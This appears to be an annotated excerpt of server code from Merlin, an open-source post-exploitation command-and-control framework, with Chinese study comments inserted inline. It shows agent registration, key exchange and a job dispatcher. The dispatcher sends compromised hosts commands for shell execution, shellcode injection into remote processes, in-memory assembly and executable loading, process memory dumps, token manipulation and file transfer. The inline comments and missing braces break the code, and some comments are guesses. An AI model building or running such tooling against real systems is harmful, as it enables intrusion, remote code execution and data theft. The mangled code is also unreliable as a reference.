   serverAuthComplete, errServerAuthComplete := server.auth.Complete(&userInit, server.regComplete)  
   if errServerAuthComplete != nil {  
      return Opaque{}, fmt.Errorf("there was an error completing the OPAQUE server authentication:\\r\\n%s", errServerAuthComplete.Error())  
   if core.Debug {  
      message("debug", fmt.Sprintf("User Auth Init:\\r\\n%+v", userInit))  
      message("debug", fmt.Sprintf("Server Auth Complete:\\r\\n%+v", serverAuthComplete))  
   serverAuthCompleteBytes, errServerAuthCompleteBytes := serverAuthComplete.ToBytes()  
   if errServerAuthCompleteBytes != nil {  
      return Opaque{}, fmt.Errorf("there was an error marshalling the OPAQUE server authentication complete message to bytes:\\r\\n%s", errServerAuthCompleteBytes.Error())  
   returnMessage := Opaque{  
      Type:    AuthInit,  
      Payload: serverAuthCompleteBytes,  
   return returnMessage, nil  
// ServerAuthenticateComplete consumes the Agent's authentication messages and finishes the authentication and key exchange  
func ServerAuthenticateComplete(o Opaque, server \*Server) error {  
   if core.Debug {  
      message("debug", "Entering into opaque.ServerAuthenticateComplete() function")  
   var userComplete gopaque.UserAuthComplete  
   errFromBytes := userComplete.FromBytes(gopaque.CryptoDefault, o.Payload)  
   if errFromBytes != nil {  
      return fmt.Errorf("there was an error unmarshalling the user complete message from bytes:\\r\\n%s", errFromBytes)  
   // server auth finish  
   errAuthFinish := server.auth.Finish(&userComplete)  
   if errAuthFinish != nil {  
      return fmt.Errorf("there was an error finishing authentication:\\r\\n%s", errAuthFinish)  
   return nil  
// message is used to send send messages to STDOUT where the server is running and not intended to be sent to CLI  
func message(level string, message string) {  
   switch level {  
   case "info":  
      color.Cyan("\[i\]" + message)  
   case "note":  
      color.Yellow("\[-\]" + message)  
   case "warn":  
      color.Red("\[!\]" + message)  
   case "debug":  
      color.Red("\[DEBUG\]" + message)  
   case "success":  
      color.Green("\[+\]" + message)  
      color.Red("\[\_-\_\]Invalid message level: " + message)  


// Merlin is a post-exploitation command and control framework.  
// This file is part of Merlin.  
// Copyright (C) 2021  Russel Van Tuyl  
// Merlin is free software: you can redistribute it and/or modify  
// it under the terms of the GNU General Public License as published by  
// the Free Software Foundation, either version 3 of the License, or  
// any later version.  
// Merlin is distributed in the hope that it will be useful,  
// but WITHOUT ANY WARRANTY; without even the implied warranty of  
// GNU General Public License for more details.  
// You should have received a copy of the GNU General Public License  
// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.  
package agents  
import (  
	"strconv" 字符串类型转换  
	// 3rd Party  
	// Merlin  
	messageAPI "github.com/Ne0nd0g/merlin/pkg/api/messages"  
// Global Variables  
// Agents contains all of the instantiated agent object that are accessed by other modules  
var Agents = make(map\[uuid.UUID\]\*Agent)  
// groups map agent(s) to a string for bulk access  
var groups = make(map\[string\]\[\]uuid.UUID)  
func init() {  
	globalUUID, err := uuid.FromString("ffffffff-ffff-ffff-ffff-ffffffffffff")  
	if err == nil {  
		groups\["all"\] = \[\]uuid.UUID{globalUUID}  
// Agent is a server side structure that holds information about a Merlin Agent  
type Agent struct {  
	ID             uuid.UUID  
	Platform       string  
	Architecture   string  
	UserName       string  
	UserGUID       string  
	HostName       string  
	Ips            \[\]string  
	Pid            int  
	Process        string  
	agentLog       \*os.File 日志文件  
	InitialCheckIn time.Time  
	StatusCheckIn  time.Time  
	Version        string  
	Build          string  
	WaitTime       string  
	PaddingMax     int  
	MaxRetry       int  
	FailedCheckin  int  
	Skew           int64  
	Proto          string  
	KillDate       int64  
	RSAKeys        \*rsa.PrivateKey // RSA Private/Public key pair; Private key used to decrypt messages  
	PublicKey      rsa.PublicKey   // Public key used to encrypt messages  
	Secret         \[\]byte          // secret is used to perform symmetric encryption operations 用于执行对称加密操作  
	OPAQUE         \*opaque.Server  // Holds information about OPAQUE Registration and Authentication  保存OPAQUE的注册和认证信息  
	JA3            string          // The JA3 signature applied to the agent's TLS client 保存ja3指纹  
	Note           string          // Operator notes for an agent  
// KeyExchange is used to exchange public keys between the server and agent  
func KeyExchange(m messages.Base) (messages.Base, error) {  
	if core.Debug {  
		message("debug", "Entering into agents.KeyExchange function")  
	serverKeyMessage := messages.Base{  
		ID:      m.ID,  
		Version: 1.0,  
		Type:    messages.KEYEXCHANGE,  
		Padding: core.RandStringBytesMaskImprSrc(4096),  
	// Make sure the agent has previously authenticated  
	if !isAgent(m.ID) {  
		return serverKeyMessage, fmt.Errorf("the agent does not exist")  
	logging.Server(fmt.Sprintf("Received new agent key exchange from %s", m.ID))  
	ke := m.Payload.(messages.KeyExchange)  
	if core.Debug {  
		message("debug", fmt.Sprintf("Received new public key from %s:\\r\\n%v", m.ID, ke.PublicKey))  
	serverKeyMessage.ID = Agents\[m.ID\].ID  
	Agents\[m.ID\].PublicKey = ke.PublicKey  
	// Generate key pair  
	privateKey, rsaErr := rsa.GenerateKey(rand.Reader, 4096)  
	if rsaErr != nil {  
		return serverKeyMessage, fmt.Errorf("there was an error generating the RSA key pair:\\r\\n%s", rsaErr.Error())  
	Agents\[m.ID\].RSAKeys = privateKey  
	if core.Debug {  
		message("debug", fmt.Sprintf("Server's Public Key: %v", Agents\[m.ID\].RSAKeys.PublicKey))  
	pk := messages.KeyExchange{  
		PublicKey: Agents\[m.ID\].RSAKeys.PublicKey,  
	serverKeyMessage.ID = m.ID  
	serverKeyMessage.Payload = pk  
	if core.Debug {  
		message("debug", "Leaving agents.KeyExchange returning without error")  
		message("debug", fmt.Sprintf("serverKeyMessage: %v", serverKeyMessage))  
	return serverKeyMessage, nil  
// GetEncryptionKey retrieves the per-agent payload encryption key used to decrypt messages for any protocol  
func GetEncryptionKey(agentID uuid.UUID) (\[\]byte, error) {  
	if core.Debug {  
		message("debug", "Entering into agents.GetEncryptionKey function")  
	if !isAgent(agentID) {  
		return nil, fmt.Errorf("agent %s does not exist", agentID)  
	key := Agents\[agentID\].Secret  
	if len(key) <= 0 { 确认id为uuid 的agnet中保存的key不为空  
		return nil, fmt.Errorf("the encryption key for %s is empty", agentID)  
	if core.Debug {  
		message("debug", "Leaving agents.GetEncryptionKey function")  
	return key, nil 返回key  
// UpdateInfo is used to update an agent's information with the passed in message data 根据传入的message更新保存在服务端的agent信息  
func (a \*Agent) UpdateInfo(info messages.AgentInfo) { Agent结构体的updateinfo方法  
	if core.Debug {  
		message("debug", "Entering into agents.UpdateInfo function")  
	if core.Debug { 调式模式下输出接收到的的agent信息  
		message("debug", "Processing new agent info")  
		message("debug", fmt.Sprintf("Agent Version: %s", info.Version))  
		message("debug", fmt.Sprintf("Agent Build: %s", info.Build))  
		message("debug", fmt.Sprintf("Agent waitTime: %s", info.WaitTime))  
		message("debug", fmt.Sprintf("Agent skew: %d", info.Skew))  
		message("debug", fmt.Sprintf("Agent paddingMax: %d", info.PaddingMax))  
		message("debug", fmt.Sprintf("Agent maxRetry: %d", info.MaxRetry))  
		message("debug", fmt.Sprintf("Agent failedCheckin: %d", info.FailedCheckin))  
		message("debug", fmt.Sprintf("Agent proto: %s", info.Proto))  
		message("debug", fmt.Sprintf("Agent killdate: %s", time.Unix(a.KillDate, 0).UTC().Format(time.RFC3339)))  
		message("debug", fmt.Sprintf("Agent JA3 signature: %s", info.JA3))  
	} 日志记录接收到的agent信息  
	a.Log("Processing AgentInfo message:")  
	a.Log(fmt.Sprintf("\\tAgent Version: %s ", info.Version))  
	a.Log(fmt.Sprintf("\\tAgent Build: %s ", info.Build))  
	a.Log(fmt.Sprintf("\\tAgent waitTime: %s ", info.WaitTime))  
	a.Log(fmt.Sprintf("\\tAgent skew: %d ", info.Skew))  
	a.Log(fmt.Sprintf("\\tAgent paddingMax: %d ", info.PaddingMax))  
	a.Log(fmt.Sprintf("\\tAgent maxRetry: %d ", info.MaxRetry))  
	a.Log(fmt.Sprintf("\\tAgent failedCheckin: %d ", info.FailedCheckin))  
	a.Log(fmt.Sprintf("\\tAgent proto: %s ", info.Proto))  
	a.Log(fmt.Sprintf("\\tAgent KillDate: %s", time.Unix(a.KillDate, 0).UTC().Format(time.RFC3339)))  
	a.Log(fmt.Sprintf("\\tAgent JA3 signature: %s", info.JA3))  
	a.Version = info.Version  
	a.Build = info.Build  
	a.WaitTime = info.WaitTime  
	a.Skew = info.Skew  
	a.PaddingMax = info.PaddingMax  
	a.MaxRetry = info.MaxRetry  
	a.FailedCheckin = info.FailedCheckin  
	a.Proto = info.Proto  
	a.KillDate = info.KillDate  
	a.JA3 = info.JA3  
	a.Architecture = info.SysInfo.Architecture  
	a.HostName = info.SysInfo.HostName  
	a.Process = info.SysInfo.Process  
	a.Pid = info.SysInfo.Pid  
	a.Ips = info.SysInfo.Ips  
	a.Platform = info.SysInfo.Platform  
	a.UserName = info.SysInfo.UserName  
	a.UserGUID = info.SysInfo.UserGUID  
	if core.Debug {  
		message("debug", "Leaving agents.UpdateInfo function")  
// Log is used to write log messages to the agent's log file 向日志文件写日志  
func (a \*Agent) Log(logMessage string) {  
	if core.Debug {  
		message("debug", "Entering into agents.Log")  
	\_, err := a.agentLog.WriteString(fmt.Sprintf("\[%s\]%s\\r\\n", time.Now().UTC().Format(time.RFC3339), logMessage))  
	if err != nil {  
		message("warn", fmt.Sprintf("There was an error writing to the agent log agents.Log:\\r\\n%s", err.Error()))  
// message is used to send a broadcast message to all connected clients 向所有的客户端发送广播信息  
func message(level string, message string) {  
	m := messageAPI.UserMessage{  
		Message: message,  
		Time:    time.Now().UTC(),  
		Error:   false,  
	switch level {  
	case "info":  
		m.Level = messageAPI.Info  
	case "note":  
		m.Level = messageAPI.Note  
	case "warn":  
		m.Level = messageAPI.Warn  
	case "debug":  
		m.Level = messageAPI.Debug  
	case "success":  
		m.Level = messageAPI.Success  
	case "plain":  
		m.Level = messageAPI.Plain  
		m.Level = messageAPI.Plain  
// RemoveAgent deletes the agent object from Agents map by its ID  
func RemoveAgent(agentID uuid.UUID) error {  
	if isAgent(agentID) {  
		delete(Agents, agentID)  
		return nil  
	return fmt.Errorf("%s is not a known agent and was not removed", agentID)  
// GetAgentFieldValue returns a string value for the field value belonging to the specified Agent  
func GetAgentFieldValue(agentID uuid.UUID, field string) (string, error) {  
	if isAgent(agentID) {  
		switch strings.ToLower(field) {  
		case "platform":  
			return Agents\[agentID\].Platform, nil  
		case "architecture":  
			return Agents\[agentID\].Architecture, nil  
		case "username":  
			return Agents\[agentID\].UserName, nil  
		case "waittime":  
			return Agents\[agentID\].WaitTime, nil  
		return "", fmt.Errorf("the provided agent field could not be found: %s", field)  
	return "", fmt.Errorf("%s is not a valid agent", agentID.String())  
// isAgent enumerates a map of all instantiated agents and returns true if the provided agent UUID exists  
func isAgent(agentID uuid.UUID) bool { 遍历Agent查询传入的uuid是否在Agent Map保存的agnet的id中  
	for agent := range Agents {  
		if Agents\[agent\].ID == agentID {  
			return true  
	return false  
// New creates a new Agent and returns the object but does not add it to the global agents map 新建一个agent对象但是不把他添加到全局的agent map中  
func New(agentID uuid.UUID) (Agent, error) {  
	if core.Debug {  
		message("debug", "Entering into agents.newAgent function")  
	var agent Agent 创建agent对象(结构体)  
	if isAgent(agentID) { 确定添加的agent之前不存在  
		return agent, fmt.Errorf("the %s agent already exists", agentID)  
	agentsDir := filepath.Join(core.CurrentDir, "data", "agents")  
新建agent uuid对应的文件  
	// Create a directory for the new agent's files  
	if \_, err := os.Stat(filepath.Join(agentsDir, agentID.String())); os.IsNotExist(err) {  
		errM := os.MkdirAll(filepath.Join(agentsDir, agentID.String()), 0750)  
		if errM != nil {  
			return agent, fmt.Errorf("there was an error creating a directory for agent %s:\\r\\n%s",  
				agentID.String(), err.Error())  
		} 新建agent log文件  
		// Create the agent's log file  
		agentLog, errC := os.Create(filepath.Join(agentsDir, agentID.String(), "agent\_log.txt"))  
		if errC != nil {  
			return agent, fmt.Errorf("there was an error creating the agent\_log.txt file for agnet %s:\\r\\n%s",  
				agentID.String(), err.Error())  
		// Change the file's permissions  
		errChmod := os.Chmod(agentLog.Name(), 0600)  
		if errChmod != nil {  
			return agent, fmt.Errorf("there was an error changing the file permissions for the agent log:\\r\\n%s", errChmod.Error())  
		if core.Verbose {  
			message("note", fmt.Sprintf("Created agent log file at: %s agent\_log.txt",  
				path.Join(agentsDir, agentID.String())))  
	// Open agent's log file for writing 创建日志文件的写操作  
	f, err := os.OpenFile(filepath.Clean(filepath.Join(agentsDir, agentID.String(), "agent\_log.txt")), os.O\_APPEND|os.O\_WRONLY, 0600)  
	if err != nil {  
		return agent, fmt.Errorf("there was an error openeing the %s agent's log file:\\r\\n%s", agentID.String(), err.Error())  
	agent.ID = agentID  
	agent.agentLog = f  
	agent.InitialCheckIn = time.Now().UTC()  
	agent.StatusCheckIn = time.Now().UTC()  
	\_, errAgentLog := agent.agentLog.WriteString(fmt.Sprintf("\[%s\]%s\\r\\n", time.Now().UTC().Format(time.RFC3339), "Instantiated agent"))  
	if errAgentLog != nil {  
		message("warn", fmt.Sprintf("There was an error writing to the agent log agents.Log:\\r\\n%s", errAgentLog.Error()))  
	if core.Debug {  
		message("debug", "Leaving agents.newAgent function without error")  
	return agent, nil  
// GetLifetime returns the amount an agent could live without successfully communicating with the server 获取agnet在不能与server成功通信情况下可视为存活的数量  
func GetLifetime(agentID uuid.UUID) (time.Duration, error) {  
	if core.Debug {  
		message("debug", "Entering into agents.GetLifeTime")  
	// Check to make sure it is a known agent  
	if !isAgent(agentID) {  
		return 0, fmt.Errorf("%s is not a known agent", agentID)  
	// Check to see if PID is set to know if the first AgentInfo message has been sent 通过检查是否设置了did来确认是否发送了第一条agentinfo信息  
	if Agents\[agentID\].Pid == 0 {  
		return 0, nil  
	sleep, errSleep := time.ParseDuration(Agents\[agentID\].WaitTime)  
	if errSleep != nil {  
		return 0, fmt.Errorf("there was an error parsing the agent WaitTime to a duration:\\r\\n%s", errSleep.Error())  
	if sleep == 0 {  
		return 0, fmt.Errorf("agent WaitTime is equal to zero")  
	retry := Agents\[agentID\].MaxRetry  
	if retry == 0 {  
		return 0, fmt.Errorf("agent MaxRetry is equal to zero")  
	skew := time.Duration(Agents\[agentID\].Skew) \* time.Millisecond  
	maxRetry := Agents\[agentID\].MaxRetry  
	// Calculate the worst case scenario that an agent could be alive before dying  
	lifetime := sleep + skew  
	for maxRetry > 1 {  
		lifetime = lifetime + (sleep + skew)  
查看当前时间加上存活时间是否超过设定的kill agent时间,超过则返回报错  
	if Agents\[agentID\].KillDate > 0 {  
		if time.Now().Add(lifetime).After(time.Unix(Agents\[agentID\].KillDate, 0)) {  
			return 0, fmt.Errorf("the agent lifetime will exceed the killdate")  
	if core.Debug {  
		message("debug", "Leaving agents.GetLifeTime without error")  
	return lifetime, nil  
// SetWaitTime updates an Agent's sleep amount or Wait Time  
func SetWaitTime(agentID uuid.UUID, wait string) error {  
	if isAgent(agentID) {  
		\_, err := time.ParseDuration(wait)  
		if err != nil {  
			return fmt.Errorf("there was an error parsing %s to a duration for the Agent's WaitTime:\\r\\n%s", wait, err)  
		Agents\[agentID\].WaitTime = wait  
		return nil  
	return fmt.Errorf("the %s Agent is unknown", agentID.String())  
// SetMaxRetry updates an Agent's MaxRetry limit  
func SetMaxRetry(agentID uuid.UUID, retry string) error {  
	if isAgent(agentID) {  
		r, err := strconv.Atoi(retry)  
		if err != nil {  
			return fmt.Errorf("there was an error converting %s to an integer for Agent %s:\\n%s", retry, agentID, err)  
		Agents\[agentID\].MaxRetry = r  
		return nil  
	return fmt.Errorf("the %s Agent is unknown", agentID.String())  
// SetAgentNote updates the agent's note field 设置agnet的备注信息  
func SetAgentNote(agentID uuid.UUID, note string) error {  
	if !isAgent(agentID) {  
		return fmt.Errorf("%s is not a known agent", agentID)  
	Agents\[agentID\].Note = note  
	return nil  
// GroupAddAgent adds an agent to a group 将agent加入到一个分组下面  
func GroupAddAgent(agentID uuid.UUID, groupName string) error {  
	if !isAgent(agentID) {  
		return fmt.Errorf("%s is not a known agent", agentID)  
	grp, ok := groups\[groupName\]  
	if !ok {  
		groups\[groupName\] = \[\]uuid.UUID{agentID} 如果不存在则创建一个名称为groupname的agent数组  
	} else {  
		// Don't add it to the group if it's already there 如果这个agent的uuid存在在任何一个分组中则不再向其他分组添加  
		for \_, a := range groups\[groupName\] {  
			if uuid.Equal(a, agentID) {  
				return nil  
		groups\[groupName\] = append(grp, agentID)  
	return nil  
// GroupListAll lists groups as a table of {groupName,agentID}GroupListAll 将组列为 {groupName,agentID} 的表  
func GroupListAll() \[\]\[\]string {  
	var out \[\]\[\]string  
	for groupName, agentIDs := range groups {  
		for \_, aID := range agentIDs {  
			out = append(out, \[\]string{groupName, aID.String()})  
	return out  
// GroupListNames list out just the names of existing groups GroupListNames 仅列出目前存在的组的名称  
func GroupListNames() \[\]string {  
	keys := make(\[\]string, 0, len(groups))  
	for k := range groups {  
		keys = append(keys, k)  
	return keys  
// GroupRemoveAgent removes an agent from a group  
func GroupRemoveAgent(agentID uuid.UUID, groupName string) error {  
	if !isAgent(agentID) {  
		return fmt.Errorf("%s is not a known agent", agentID)  
	grp, ok := groups\[groupName\]  
	if !ok {  
		return fmt.Errorf("%s is not a group", groupName)  
	tmp := grp\[:0\]  
	for \_, a := range grp { 遍历grp,如果传入的uuid不为grp中的元素,则添加入tmp数组  
		if !uuid.Equal(a, agentID) {  
			tmp = append(tmp, a)  
	groups\[groupName\] = tmp 新的grp的对应的数组元素为去掉uuid的tmp数组  
	//Make sure to delete group if empty 如果groupName数组为空,删除该数组  
	if len(groups\[groupName\]) == 0 {  
		delete(groups, groupName)  
	return nil  


// Merlin is a post-exploitation command and control framework.  
// This file is part of Merlin.  
// Copyright (C) 2021  Russel Van Tuyl  
// Merlin is free software: you can redistribute it and/or modify  
// it under the terms of the GNU General Public License as published by  
// the Free Software Foundation, either version 3 of the License, or  
// any later version.  
// Merlin is distributed in the hope that it will be useful,  
// but WITHOUT ANY WARRANTY; without even the implied warranty of  
// GNU General Public License for more details.  
// You should have received a copy of the GNU General Public License  
// along with Merlin.  If not, see <http://www.gnu.org/licenses/>.  
package jobs  
import (  
   // Standard  
   // 3rd Party  
   uuid "github.com/satori/go.uuid"  
   // Internal  
   messageAPI "github.com/Ne0nd0g/merlin/pkg/api/messages"  
   merlinJob "github.com/Ne0nd0g/merlin/pkg/jobs"  
// JobsChannel contains a map of all instantiated jobs created on the server by each Agent's ID  
JobsChannel 包含由每个 Agent 的 ID 在服务器上创建的所有实例化 job 的映射  
var JobsChannel = make(map\[uuid.UUID\]chan merlinJob.Job)  
// Jobs is a map that contains specific information about an individual job and is embedded in the JobsChannel  
Jobs 是一个map,其中包含有关单个jon的结构体信息,并嵌入在 JobsChannel 中  
var Jobs = make(map\[string\]info)  
//  info is a structure for holding data for single task assigned to a single agent  
info 是一种结构体,用于保存分配给单个agent的单个task的数据信息包括uuid、job类型、  
type info struct {  
   AgentID   uuid.UUID // ID of the agent the job belong to  
   Type      string    // Type of job  
   Token     uuid.UUID // A unique token for each task that acts like a CSRF token to prevent multiple job messages 每个任务的token,防止伪造job数据  
   Status    int       // Use JOB\_ constants 使用JOB\_的常数  
   Chunk     int       // The chunk number chunk切片传输数据序号  
   Created   time.Time // Time the job was created 创建时间  
   Sent      time.Time // Time the job was sent to the agent 发送时间  
   Completed time.Time // Time the job finished 完成时间  
   Command   string    // The actual command job 包含的命令  
// Add creates a job and adds it to the specified agent's job channel 创建一个job并加入到指定的job channel中  
func Add(agentID uuid.UUID, jobType string, jobArgs \[\]string) (string, error) {  
   // TODO turn this into a method of the agent struct  
   if core.Debug {  
      message("debug", fmt.Sprintf("In jobs.Job function for agent: %s", agentID.String()))  
      message("debug", fmt.Sprintf("In jobs.Add function for type: %s, arguments: %v", jobType, jobType))  
   } 调试信息输出当前job的agent uuid和任务类型  
   agent, ok := agents.Agents\[agentID\]  
   //if !ok {  
   // return "", fmt.Errorf("%s is not a valid agent", agentID)  
   var job merlinJob.Job  
   switch jobType {  
   case "agentInfo":  
      job.Type = merlinJob.CONTROL 常量merlin 控制message CONTROL = 11 // AgentControl  
      job.Payload = merlinJob.Command{  
         Command: "agentInfo", 命令为输出agent info  
   case "download":  
      job.Type = merlinJob.FILETRANSFER 文件传输  
      if ok {  
         agent.Log(fmt.Sprintf("Downloading file from agent at %s\\n", jobArgs\[0\]))  
      p := merlinJob.FileTransfer{ merilin文件传输  
      /\*type FileTransfer struct {  
	FileLocation string \`json:"dest"\` 文件地址  
	FileBlob     string \`json:"blob"\` 文件内容  
	IsDownload   bool   \`json:"download"\`  
         FileLocation: jobArgs\[0\],  
         IsDownload:   false,  
      job.Payload = p  
   case "cd": 切换目录  
      job.Type = merlinJob.NATIVE agent系统原生命令  
      	// NATIVE 用于发送 NativeCmd 消息  
	NATIVE = 13 // NativeCmd  
      p := merlinJob.Command{  
         Command: "cd",  
         Args:    jobArgs\[0:\],  
      job.Payload = p  
   case "CreateProcess":创建进程命令在merlin moudle中  
      job.Type = merlinJob.MODULE   
      p := merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
      job.Payload = p  
   case "env":  
      job.Type = merlinJob.NATIVE 输出agent env信息 为原生命令  
      job.Payload = merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
   case "exit":  
      job.Type = merlinJob.CONTROL 控制命令  
      p := merlinJob.Command{  
         Command: jobArgs\[0\], // TODO, this should be in jobType position 这个因该为一个单独的job type  
      job.Payload = p  
   case "ifconfig":  
      job.Type = merlinJob.NATIVE 原生命令ifconfig  
      job.Payload = merlinJob.Command{  
         Command: jobType,  
   case "initialize":  
      job.Type = merlinJob.CONTROL  
      p := merlinJob.Command{  
         Command: jobType,  
      job.Payload = p  
   case "invoke-assembly": invoke-assembly(调用程序集)需要至少一个参数  
      if len(jobArgs) < 1 {  
         return "", fmt.Errorf("exected 1 argument for the invoke-assembly command, received: %+v", jobArgs)  
      job.Type = merlinJob.MODULE 调用程序集的命令在moudle中(通过invoke-assembly方式执行系统命令)  
      job.Payload = merlinJob.Command{  
         Command: "clr",  
         Args:    append(\[\]string{jobType}, jobArgs...),  
   case "ja3":  
      job.Type = merlinJob.CONTROL 修改ja3指纹  
      p := merlinJob.Command{  
         Command: jobArgs\[0\],  
      if len(jobArgs) == 2 {  
         p.Args = jobArgs\[1:\]  
      job.Payload = p  
   case "killdate": 干掉\\重置u时间(?)  
      job.Type = merlinJob.CONTROL   
      p := merlinJob.Command{  
         Command: jobArgs\[0\],  
      if len(jobArgs) == 2 {  
         p.Args = jobArgs\[1:\]  
      job.Payload = p  
   case "killprocess":(干掉进程)  
      job.Type = merlinJob.NATIVE  
      p := merlinJob.Command{  
         Command: "killprocess",  
         Args:    jobArgs,  
      job.Payload = p  
   case "list-assemblies": 列出程序集  
      job.Type = merlinJob.MODULE  
      job.Payload = merlinJob.Command{  
         Command: "clr",  
         Args:    \[\]string{"list-assemblies"},  
   case "load-assembly":加载程序集  
      if len(jobArgs) < 1 {  
         return "", fmt.Errorf("exected 1 argument for the load-assembly command, received: %+v", jobArgs)  
      job.Type = merlinJob.MODULE  
      assembly, err := ioutil.ReadFile(jobArgs\[0\]) 通过读取文件加载assembly  
      if err != nil {  
         return "", fmt.Errorf("there was an error reading the assembly at %s:\\n%s", jobArgs\[0\], err)  
      fileHash := sha256.New() 计算assembly文件hash  
      \_, err = io.WriteString(fileHash, string(assembly))  
      if err != nil {  
         message("warn", fmt.Sprintf("there was an error generating a file hash:\\n%s", err))  
      if ok {  
         agent.Log(fmt.Sprintf("loading assembly from %s with a SHA256: %s to agent", jobArgs\[0\], fileHash.Sum(nil)))  
      name := filepath.Base(jobArgs\[0\])  
      if len(jobArgs) > 1 {  
         name = jobArgs\[1\]  
      job.Payload = merlinJob.Command{  
         Command: "clr",  
         Args:    \[\]string{jobType, base64.StdEncoding.EncodeToString(\[\]byte(assembly)), name}job类型,base64编码assembly内容,n文件地址  
   case "load-clr":  
      if len(jobArgs) < 1 {  
         return "", fmt.Errorf("exected 1 argument for the load-clr command, received: %+v", jobArgs)  
      job.Type = merlinJob.MODULE  
      job.Payload = merlinJob.Command{  
         Command: "clr",  
         Args:    append(\[\]string{jobType}, jobArgs...),  
   case "ls":  
      job.Type = merlinJob.NATIVE 系统原生列目录命令  
      p := merlinJob.Command{  
         Command: "ls", // TODO This should be in the jobType position  
      if len(jobArgs) > 0 {  
         p.Args = jobArgs\[0:\]  
      } else {  
         p.Args = \[\]string{"./"}  
      job.Payload = p  
   case "maxretry": 设置最大充实次数  
      job.Type = merlinJob.CONTROL  
      p := merlinJob.Command{  
         Command: jobArgs\[0\], // TODO This should be in the jobType postion  
      if len(jobArgs) == 2 {  
         p.Args = jobArgs\[1:\]  
      job.Payload = p  
   case "memfd": 读文件(?)   
      if len(jobArgs) < 1 {  
         return "", fmt.Errorf("expected 1 argument for the memfd command, received %d", len(jobArgs))  
      executable, err := ioutil.ReadFile(jobArgs\[0\])  
      if err != nil {  
         return "", fmt.Errorf("there was an error reading %s: %v", jobArgs\[0\], err)  
      fileHash := sha256.New()  
      \_, err = io.WriteString(fileHash, string(executable))  
      if err != nil {  
         message("warn", fmt.Sprintf("There was an error generating file hash:\\r\\n%s", err.Error()))  
      b := base64.StdEncoding.EncodeToString(executable)  
      job.Type = merlinJob.MODULE  
      job.Payload = merlinJob.Command{  
         Command: jobType,  
         Args:    append(\[\]string{b}, jobArgs\[1:\]...),  
   case "Minidump": 读进程(?)内容在moudle中  
      job.Type = merlinJob.MODULE  
      p := merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
      job.Payload = p  
   case "netstat":  
      job.Type = merlinJob.MODULE  
      p := merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
      job.Payload = p  
   case "nslookup":  
      job.Type = merlinJob.NATIVE  
      job.Payload = merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
   case "padding": 填充字段查看  
      job.Type = merlinJob.CONTROL  
      p := merlinJob.Command{  
         Command: jobArgs\[0\],  
      if len(jobArgs) == 2 {  
         p.Args = jobArgs\[1:\]  
      job.Payload = p  
   case "pipes": 管道(内容在moudle中)  
      job.Type = merlinJob.MODULE  
      p := merlinJob.Command{  
         Command: "pipes",  
      job.Payload = p  
   case "ps":  
      job.Type = merlinJob.MODULE  
      p := merlinJob.Command{  
         Command: "ps",  
      job.Payload = p  
   case "pwd":  
      job.Type = merlinJob.NATIVE  
      p := merlinJob.Command{  
         Command: jobArgs\[0\], // TODO This should be in the jobType position  
      job.Payload = p  
   case "rm":  
      job.Type = merlinJob.NATIVE  
      job.Payload = merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs\[0:1\],  
   case "run", "exec":  
      job.Type = merlinJob.CMD  
      payload := merlinJob.Command{  
         Command: jobArgs\[0\],  
      if len(jobArgs) > 1 {  
         payload.Args = jobArgs\[1:\]  
      job.Payload = payload  
   case "runas": linux高级命令,内容在moudle中(设置别名?)  
      job.Type = merlinJob.MODULE  
      job.Payload = merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
   case "sdelete": 删除  
      job.Type = merlinJob.NATIVE  
      job.Payload = merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
   case "shell": cmd命令,发送cmd payload  
      job.Type = merlinJob.CMD  
      payload := merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
      job.Payload = payload  
   case "shellcode": 发送shellcode payload  
      job.Type = merlinJob.SHELLCODE  
      payload := merlinJob.Shellcode{  
         Method: jobArgs\[0\],  
      if payload.Method == "self" {  
         payload.Bytes = jobArgs\[1\]  
      } else if payload.Method == "remote" || payload.Method == "rtlcreateuserthread" || payload.Method == "userapc" {  
         i, err := strconv.Atoi(jobArgs\[1\])  
         if err != nil {  
            return "", err  
         payload.PID = uint32(i)  
         payload.Bytes = jobArgs\[2\]  
      job.Payload = payload  
   case "skew": 偏斜??  
      job.Type = merlinJob.CONTROL  
      p := merlinJob.Command{  
         Command: jobArgs\[0\],  
      if len(jobArgs) == 2 {  
         p.Args = jobArgs\[1:\]  
      job.Payload = p  
   case "sleep":  
      job.Type = merlinJob.CONTROL  
      p := merlinJob.Command{  
         Command: jobArgs\[0\],  
      if len(jobArgs) == 2 {  
         p.Args = jobArgs\[1:\]  
      job.Payload = p  
   case "ssh":  
      job.Type = merlinJob.MODULE  
      job.Payload = merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
   case "token": token令牌命令在moudle中  
      job.Type = merlinJob.MODULE  
      job.Payload = merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
   case "touch":  
      job.Type = merlinJob.NATIVE  
      job.Payload = merlinJob.Command{  
         Command: jobType,  
         Args:    jobArgs,  
   case "upload":  
      job.Type = merlinJob.FILETRANSFER  
      if len(jobArgs) < 2 {  
         return "", fmt.Errorf("expected 2 arguments for upload command, received %d", len(jobArgs))  
      uploadFile, uploadFileErr := ioutil.ReadFile(jobArgs\[0\])  
      if uploadFileErr != nil {  
         // TODO send "ServerOK"  
         return "", fmt.Errorf("there was an error reading %s: %v", merlinJob.String(job.Type), uploadFileErr)  
      fileHash := sha256.New()  
      \_, err := io.WriteString(fileHash, string(uploadFile))  
      if err != nil {  
         message("warn", fmt.Sprintf("There was an error generating file hash:\\r\\n%s", err.Error()))  
      if ok {  
         agent.Log(fmt.Sprintf("Uploading file from server at %s of size %d bytes and SHA-256: %x to agent at %s",  
      p := merlinJob.FileTransfer{  
         FileLocation: jobArgs\[1\],  
         FileBlob:     base64.StdEncoding.EncodeToString(\[\]byte(uploadFile)),  
         IsDownload:   true,  
      job.Payload = p  
   case "uptime": 更新时间  
      job.Type = merlinJob.MODULE  
      p := merlinJob.Command{  
         Command: "uptime",  
      job.Payload = p  
      return "", fmt.Errorf("invalid job type: %d", job.Type)  
   // If the Agent is set to broadcast identifier for ALL agents  
